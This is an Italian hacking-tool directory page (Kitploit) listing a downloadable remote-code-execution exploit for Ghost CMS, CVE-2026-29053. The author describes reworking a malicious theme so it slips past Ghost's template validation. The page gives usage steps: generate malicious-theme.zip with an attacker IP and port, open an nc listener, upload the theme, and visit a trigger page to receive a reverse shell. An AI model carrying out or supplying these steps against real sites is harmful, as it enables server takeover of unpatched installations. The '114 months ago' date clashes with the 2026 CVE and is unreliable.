Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-29053 — Vulnerabilità (RCE) scoperta in Ghost CMS (che colpisce in particolare le versioni dalla 0.7.2 alla 6.19.0) | Kitploit
Strumenti/GitHubGitHub/ac8999/cve-2026-29053
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubac8999/cve-2026-29053

CVE-2026-29053

Vulnerabilità (RCE) scoperta in Ghost CMS (che colpisce in particolare le versioni dalla 0.7.2 alla 6.19.0)

Vedi Repository
114 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Questa è una rielaborazione della repository di rootxran per questa stessa CVE - https://github.com/rootxran/CVE-2026-29053

Durante i test su specifici ambienti Ghost CMS, il payload del tema originale ha generato un Fatal Handlebars Error. Il CMS non è riuscito ad attivare il tema dannoso perché faceva riferimento a un helper deprecato o mancante (social_url) all'interno del file author.hbs.

Ho aggiornato i template Handlebars per utilizzare helper nativi e compatibili. Questo garantisce che il tema superi i controlli di validazione interni di Ghost, consentendo allo exploit di attivarsi correttamente senza essere bloccato dal parser di sicurezza del motore dei temi.

Utilizzo: (fare riferimento allo exploit originale per la guida video).

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/
Scarica lo strumento